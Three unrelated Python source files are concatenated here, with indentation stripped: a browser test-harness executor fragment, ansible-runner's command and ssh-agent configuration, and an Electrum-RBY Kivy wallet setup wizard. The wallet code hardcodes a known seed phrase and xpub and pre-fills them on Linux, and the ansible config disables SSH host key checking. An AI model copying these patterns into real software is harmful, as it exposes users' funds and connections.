stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
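# Each stack entry is ((lhs_node, rhs_node), relation); the test passes if some
# chain of matching comparisons reaches a leaf reference.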
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes[0], hashes[1], relation):
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [{"url": nodes[0].url, "screenshot": screenshots[0]}, relation,
{"url": nodes[1].url, "screenshot": screenshots[1]}]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(self.timeout)
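# If the worker thread has not produced a result by the deadline, report an
# external timeout instead of blocking forever.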
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
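# No-op implementation for executors that don't keep a persistent connection to the browser.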
def execute_script(self, script, async=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = httplib.HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol)
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [url] + payload
return True, rv
def process_action(self, url, payload):
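# Run the requested action against the test window and report success or failure
# back through the testdriver protocol part; the previous window is restored afterwards.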
parent = self.protocol.base.current_window
try:
self.protocol.base.set_window(self.test_window)
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
action_handler(payload)
except Exception as e:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "failure")
else:
self.logger.debug("Action %s completed" % action)
self._send_message("complete", "success")
finally:
self.protocol.base.set_window(parent)
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(elements[0])
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(elements[0], keys)
|
runner_config.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import re
import pipes
import threading
import pexpect
import stat
import shlex
from uuid import uuid4
from collections import Mapping
#from distutils.spawn import find_executable
from six import iteritems, string_types
from ansible_runner import output
from ansible_runner.exceptions import ConfigurationError
from ansible_runner.loader import ArtifactLoader
class RunnerConfig(object):
"""
A ``Runner`` configuration object that's meant to encapsulate the configuration used by the
:py:mod:`ansible_runner.runner.Runner` object to launch and manage the invocation of ``ansible``
and ``ansible-playbook``.
Typically this object is initialized for you when using the standard ``run`` interfaces in :py:mod:`ansible_runner.interface`
but can be used to construct the ``Runner`` configuration to be invoked elsewhere. It can also be overridden to provide different
functionality to the Runner object.
:Example:
>>> rc = RunnerConfig(...)
>>> r = Runner(config=rc)
>>> r.run()
"""
def __init__(self,
private_data_dir=None, playbook=None, ident=uuid4(),
inventory=None, roles_path=None, limit=None, module=None, module_args=None,
verbosity=None, quiet=False, json_mode=False, artifact_dir=None,
rotate_artifacts=0, host_pattern=None, binary=None, extravars=None):
self.private_data_dir = os.path.abspath(private_data_dir)
self.ident = ident
self.json_mode = json_mode
self.playbook = playbook
self.inventory = inventory
self.roles_path = roles_path
self.limit = limit
self.module = module
self.module_args = module_args
self.host_pattern = host_pattern
self.binary = binary
self.rotate_artifacts = rotate_artifacts
self.artifact_dir = artifact_dir or self.private_data_dir
if self.ident is None:
self.artifact_dir = os.path.join(self.artifact_dir, "artifacts")
else:
self.artifact_dir = os.path.join(self.artifact_dir, "artifacts", "{}".format(self.ident))
self.extra_vars = extravars
self.verbosity = verbosity
self.quiet = quiet
self.loader = ArtifactLoader(self.private_data_dir)
def prepare(self):
"""
Performs basic checks and then properly invokes
- prepare_inventory
- prepare_env
- prepare_command
It's also responsible for wrapping the command with the proper ssh agent invocation
and setting early ANSIBLE_ environment variables.
"""
# ansible_path = find_executable('ansible')
# if ansible_path is None or not os.access(ansible_path, os.X_OK):
# raise ConfigurationError("Ansible not found. Make sure that it is installed.")
if self.private_data_dir is None:
raise ConfigurationError("Runner Base Directory is not defined")
if self.module is None and self.playbook is None: # TODO: ad-hoc mode, module and args
raise ConfigurationError("Runner playbook or module is not defined")
if self.module and self.playbook:
raise ConfigurationError("Only one of playbook and module options are allowed")
if not os.path.exists(self.artifact_dir):
os.makedirs(self.artifact_dir)
self.prepare_inventory()
self.prepare_env()
self.prepare_command()
# write the SSH key data into a fifo read by ssh-agent
if self.ssh_key_data:
self.ssh_key_path = os.path.join(self.artifact_dir, 'ssh_key_data')
self.open_fifo_write(self.ssh_key_path, self.ssh_key_data)
self.command = self.wrap_args_with_ssh_agent(self.command, self.ssh_key_path)
# Use local callback directory
callback_dir = os.getenv('AWX_LIB_DIRECTORY')
if callback_dir is None:
callback_dir = os.path.join(os.path.split(os.path.abspath(__file__))[0],
"callbacks")
python_path = os.getenv('PYTHONPATH', '')
if python_path:
python_path += ":"
self.env['ANSIBLE_CALLBACK_PLUGINS'] = callback_dir
if 'AD_HOC_COMMAND_ID' in self.env:
self.env['ANSIBLE_STDOUT_CALLBACK'] = 'minimal'
else:
self.env['ANSIBLE_STDOUT_CALLBACK'] = 'awx_display'
self.env['ANSIBLE_RETRY_FILES_ENABLED'] = 'False'
self.env['ANSIBLE_HOST_KEY_CHECKING'] = 'False'
self.env['AWX_ISOLATED_DATA_DIR'] = self.artifact_dir
self.env['PYTHONPATH'] = python_path + callback_dir + ':'
if self.roles_path:
self.env['ANSIBLE_ROLES_PATH'] = ':'.join(self.roles_path)
def prepare_inventory(self):
"""
Prepares the default inventory path under ``private_data_dir`` when one is not supplied to the constructor.
"""
if self.inventory is None:
self.inventory = os.path.join(self.private_data_dir, "inventory")
def prepare_env(self):
"""
Manages reading environment metadata files under ``private_data_dir`` and merging/updating
with existing values so the :py:class:`ansible_runner.runner.Runner` object can read and use them easily
"""
try:
passwords = self.loader.load_file('env/passwords', Mapping)
self.expect_passwords = {
re.compile(pattern, re.M): password
for pattern, password in iteritems(passwords)
}
except ConfigurationError:
output.debug('Not loading passwords')
self.expect_passwords = dict()
self.expect_passwords[pexpect.TIMEOUT] = None
self.expect_passwords[pexpect.EOF] = None
try:
# seed env with existing shell env
self.env = os.environ.copy()
envvars = self.loader.load_file('env/envvars', Mapping)
if envvars:
self.env.update({k:str(v) for k, v in envvars.items()})
except ConfigurationError:
output.debug("Not loading environment vars")
# Still need to pass default environment to pexpect
self.env = os.environ.copy()
# extravars dict passed in via the interface API takes precedence over on-disk
if not self.extra_vars and self.loader.isfile('env/extravars'):
self.extra_vars = self.loader.abspath('env/extravars')
try:
self.settings = self.loader.load_file('env/settings', Mapping)
except ConfigurationError:
output.debug("Not loading settings")
self.settings = dict()
try:
self.ssh_key_data = self.loader.load_file('env/ssh_key', string_types)
except ConfigurationError:
output.debug("Not loading ssh key")
self.ssh_key_data = None
self.idle_timeout = self.settings.get('idle_timeout', None)
self.job_timeout = self.settings.get('job_timeout', None)
self.pexpect_timeout = self.settings.get('pexpect_timeout', 5)
self.pexpect_use_poll = self.settings.get('pexpect_use_poll', True)
self.suppress_ansible_output = self.settings.get('suppress_ansible_output', self.quiet)
if 'AD_HOC_COMMAND_ID' in self.env or not os.path.exists(os.path.join(self.private_data_dir, 'project')):
self.cwd = self.private_data_dir
else:
self.cwd = os.path.join(self.private_data_dir, 'project')
def prepare_command(self):
"""
Determines whether a literal ``ansible`` or ``ansible-playbook`` command line was supplied (via the ``args`` file)
and, if not, calls :py:meth:`ansible_runner.runner_config.RunnerConfig.generate_ansible_command`
"""
try:
self.command = self.loader.load_file('args', string_types)
except ConfigurationError:
self.command = self.generate_ansible_command()
def generate_ansible_command(self):
"""
Given that the ``RunnerConfig`` preparation methods have been run to gather the inputs, this method
generates the ``ansible`` or ``ansible-playbook`` command that will be used by the
:py:class:`ansible_runner.runner.Runner` object to start the process.
"""
if self.binary is not None:
base_command = self.binary
elif self.module is not None:
base_command = 'ansible'
else:
base_command = 'ansible-playbook'
exec_list = [base_command]
try:
cmdline_args = self.loader.load_file('env/cmdline', string_types)
args = shlex.split(cmdline_args.decode('utf-8'))
exec_list.extend(args)
except ConfigurationError:
pass
exec_list.append("-i")
exec_list.append(self.inventory)
if self.limit is not None:
exec_list.append("--limit")
exec_list.append(self.limit)
if isinstance(self.extra_vars, dict) and self.extra_vars:
exec_list.extend(
[
'-e',
'\'%s\'' % ' '.join(
["{}=\"{}\"".format(k, self.extra_vars[k]) for k in self.extra_vars]
)
]
)
elif self.extra_vars:
exec_list.extend(['-e', '@%s' % self.extra_vars])
if self.verbosity:
v = 'v' * self.verbosity
exec_list.append('-%s' % v)
# Other parameters
if base_command.endswith('ansible-playbook'):
exec_list.append(self.playbook)
elif base_command.endswith('ansible'):
exec_list.append("-m")
exec_list.append(self.module)
if self.module_args is not None:
exec_list.append("-a")
exec_list.append(self.module_args)
if self.host_pattern is not None:
exec_list.append(self.host_pattern)
return exec_list
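# Illustrative expectation (values are hypothetical): with playbook='site.yml',
# inventory='/data/inventory', verbosity=2 and no extra vars or env/cmdline file,
# generate_ansible_command() should return roughly
#   ['ansible-playbook', '-i', '/data/inventory', '-vv', 'site.yml']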
def wrap_args_with_ssh_agent(self, args, ssh_key_path, ssh_auth_sock=None, silence_ssh_add=False):
"""
Given an existing command line and parameterization, this returns the same command line wrapped with the
necessary calls to ``ssh-agent``.
"""
if ssh_key_path:
ssh_add_command = self.args2cmdline('ssh-add', ssh_key_path)
if silence_ssh_add:
ssh_add_command = ' '.join([ssh_add_command, '2>/dev/null'])
cmd = ' && '.join([ssh_add_command,
self.args2cmdline('rm', '-f', ssh_key_path),
self.args2cmdline(*args)])
args = ['ssh-agent']
if ssh_auth_sock:
args.extend(['-a', ssh_auth_sock])
args.extend(['sh', '-c', cmd])
return args
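# Illustrative expectation (paths are hypothetical): wrapping
# ['ansible-playbook', 'site.yml'] with ssh_key_path='/tmp/key' yields roughly
#   ['ssh-agent', 'sh', '-c',
#    'ssh-add /tmp/key && rm -f /tmp/key && ansible-playbook site.yml']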
def open_fifo_write(self, path, data):
# TODO: Switch to utility function
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(self, *args):
# TODO: switch to utility function
return ' '.join([pipes.quote(a) for a in args])
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_rby.base_wizard import BaseWizard
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# Global variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_rby_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From %d cosigners')%n.value
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require %d signatures')%m.value
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_rby.mnemonic import Mnemonic
from electrum_rby.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x) > i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = bool(last_word) and (c.text.lower() not in p)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/restoring
wallets.
'''
